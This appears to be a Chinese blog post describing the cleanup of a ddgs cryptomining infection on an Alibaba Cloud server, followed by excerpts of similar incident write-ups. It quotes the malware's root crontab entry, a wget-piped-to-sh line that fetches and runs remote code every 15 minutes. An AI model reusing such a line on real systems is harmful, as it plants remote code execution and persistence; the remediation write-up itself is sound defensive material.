週末收到阿里雲異常登入的簡訊提醒,沒有理會,周一上線看了眼,cpu占用100%,發現被攻擊了。
先修改管理員的登入密碼
2.檢視ddgs程序並殺掉
ps -aux|grep ddgs
發現執行檔案在/tmp目錄下
先取消掉執行許可權
chmod -x ddgs.3014
chmod -x qw3xt.3
留意目錄/var/spool/cron 遇到不認識的連線 直接乾掉
我的目錄下就發現了乙個/var/spool/cron/crontabs/root檔案
檔案內容
*/15 * * * * wget -q -o- |sh
3.刪除/tmp 目錄下的病毒檔案,問題解決
4.檢視top,再未發現相應的程序
阿里雲伺服器中挖礦木馬處理過程
登陸伺服器,發現cpu達100 並且安騎士提示有挖礦程序。因為對linux系統不是很熟悉,故而邊找資料邊處理實驗,最後記錄下來以便日後處理備查。首先登陸伺服器,使用top命令檢視程序 cpu飆到100 按cpu消耗排序,排在第一的是乙個名為 imwbr1 的程序,查了一下是乙個挖礦木馬,但是過了一會...
記一次公司linux伺服器被挖礦
centos7.6 有些問題不是我遇到的 也一併記錄 伺服器執行緩慢,cpu飆公升,top一下,懷疑是挖礦程式.這個病毒還不是算很 很多挖礦病毒,使用top命令都看不到挖礦程式的程序。執行命令ps aux sort pcpu head 10 基本確定就是這兩程序了 kill 9 pid 基本沒用,肯...
記 第一次伺服器被挖礦
搭建了那麼多台伺服器,終於有人來搞我了。還有點小激動是怎麼一回事 首先發現的,還是公司裡乙個主管網路的大佬。他盯著公司裡每乙個ip的上下行,然後發現 哎呀,這個機子有點不對勁啊。遂通知主管,然後就到我這裡了。然後,由於本人的linux知識還是太匱乏,書到用時方恨少,排查問題多彎路啊,唉。然後我突然想...